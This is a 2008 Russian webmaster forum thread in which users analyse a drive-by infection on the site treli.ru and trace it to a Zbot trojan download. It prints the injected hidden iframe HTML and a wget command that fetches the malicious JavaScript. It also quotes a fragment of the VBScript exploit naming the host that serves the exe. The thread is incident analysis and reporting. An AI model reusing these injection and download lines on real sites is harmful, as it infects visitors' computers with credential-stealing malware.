Форум Не про работу Курилка

Если "каспер" не врёт, то сайт Соловьева распространяет трояны

12
K
На сайте с 24.03.2004
Offline
223
kostich
1180

ps. надо ручками скриптик поковырять, а то что-то мне кажется каспер слишком уж реагирует неадекватно.

kostich добавил 03.02.2008 в 09:21

ага, точно...

в treli.ru проинсертили фрейм с krandash(dot)narod(dot)ru, а оттуда уже идет на amfitos(dot)com/classes/ie

зы. сейчас скриптик декриптнем и скажем откуда гадость идет... интересно через сколько яшкин саппорт домен этот прибьет.

проверенная ддос защита (http://ddos-protection.ru) -> http://ddos-protection.ru (http://ddos-protection.ru), бесплатный тест, цена от размера атаки не зависит.
dkameleon
На сайте с 09.12.2005
Offline
386
dkameleon
#1

Похоже с сайта ифрейм уже убран. Я найти в коде страницы не смог.

на amfitos тоже мне какую-то фигню из яваскрипта декодирует и пишет - типа ИП заблочен. Вредоносных действий тоже не наблюдается.

Возможно я - не целевая аудитория :)

Дизайн интерьера (http://balabukha.com/)
K
На сайте с 24.03.2004
Offline
223
kostich
#2
dkameleon:
Похоже с сайта ифрейм уже убран. Я найти в коде страницы не смог.

на amfitos тоже мне какую-то фигню из яваскрипта декодирует и пишет - типа ИП заблочен. Вредоносных действий тоже не наблюдается.
Возможно я - не целевая аудитория :)

ну кто успел, тот скушал дежурной командой аля: 

wget --referer="http://treli.ru" --user-agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1..4322)" http://amfitos(dot)com/classes/ie

и вот оно тогда отдает почти 16 кил жабаскрипта... кстати я сейчас опять wgetнул treli и ничего там не убрали, ну а по поводу народовского домена на NOC яшкин кинул.

kostich добавил 03.02.2008 в 10:05

dkameleon:
Похоже с сайта ифрейм уже убран. 

<div class="cnt"><iframe src="http://banner.lbs.km.ru/1460284type=2rnd=0" frameb

order=0 vspace=0 hspace=0 width="520" height="80" marginwidth="0" marginheight="

0" scrolling="no"><a href="http://www.km.ru"><iframe src='http://krandash.narod.

ru' width='1' height='1' style='visibility:hidden'></iframe><img src="http://ban

ner.lbs.km.ru/1460284type=3rnd=0" width="520" height="80" alt="e-Style Advert" /

></a></iframe></div>

да тут он, никуда он не делся.

dkameleon
На сайте с 09.12.2005
Offline
386
dkameleon
#3
kostich:
да тут он, никуда он не делся.

я на главной искал - там не оказалось. на странице новости таки есть ифрейм.

K
На сайте с 24.03.2004
Offline
223
kostich
#4
dkameleon:
я на главной искал - там не оказалось. на странице новости таки есть ифрейм.

Да, кстати, попутно они нашли еще уязвимость на narod-e, т.к. открывающихся тэгов для запрета фреймов, скриптов и прочего там почему-то нет... а вот закрывающиеся видны.

NikBatman
На сайте с 24.02.2006
Offline
140
NikBatman
#5

Касперский, он как антивирус горбатый со своего рождения.

Ставьте McAffe и все станет на свои места с вирусами. ;)

У носорога плохое зрение, но при его весе это не его проблема.
dkameleon
На сайте с 09.12.2005
Offline
386
dkameleon
#6
kostich:
Да, кстати, попутно они нашли еще уязвимость на narod-e, т.к. открывающихся тэгов для запрета фреймов, скриптов и прочего там почему-то нет... а вот закрывающиеся видны.

там нет запрета фреймов и скриптов. :)

закрывающиеся теги сделаны дя того, чтобы пользователь не мог убрать рекламу, которая как раз ниже выводится.

K
На сайте с 24.03.2004
Offline
223
kostich
#7
NikBatman:
Касперский, он как антивирус горбатый со своего рождения.
Ставьте McAffe и все станет на свои места с вирусами. ;)

ну так там реально какая-то хрень сгружается и спасибо касперу за то что сообщило...

kostich добавил 03.02.2008 в 12:25

Загружается там в итоге сплойт на VB, а exe берет вот тут: 

    on error resume next

    dsl = "http://amfitos.com/classes/ie/exe.php"

    Set ydsf = document.createElement("object")

kipf1="clsi"

kipf2="d:BD96"

после проверки каспером сказало что там Trojan-Spy.Win32.Zbot.zf (NOD32 спокойно отреагировал)

ps. Буду благодарен, если кто-то ковырнет адрес хоста на который стучит троян, т.к. в винде у нас все нули.

kostich добавил 03.02.2008 в 12:30

На VirusTotal его уже знают -> http://www.virustotal.com/ru/reanalisis.html?40bf2cf2e37288ab36bb384d4a7b065b В проверке от 01.27 макафи сосал, если прямым текстом.

Боб Губко
На сайте с 19.01.2008
Offline
108
Боб Губко
#8
kostich:


после проверки каспером сказало что там Trojan-Spy.Win32.Zbot.zf (NOD32 спокойно отреагировал)

А я всегда говорил, что каспер лучше нода!:)

K
На сайте с 24.03.2004
Offline
223
kostich
#9

больше всех прикалывают сотрудники Яндекс-а, т.к. прошло уже 8 часов а сайт на народе жив.

[Удален]
#10

А причем тут сотрудники яндекса?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий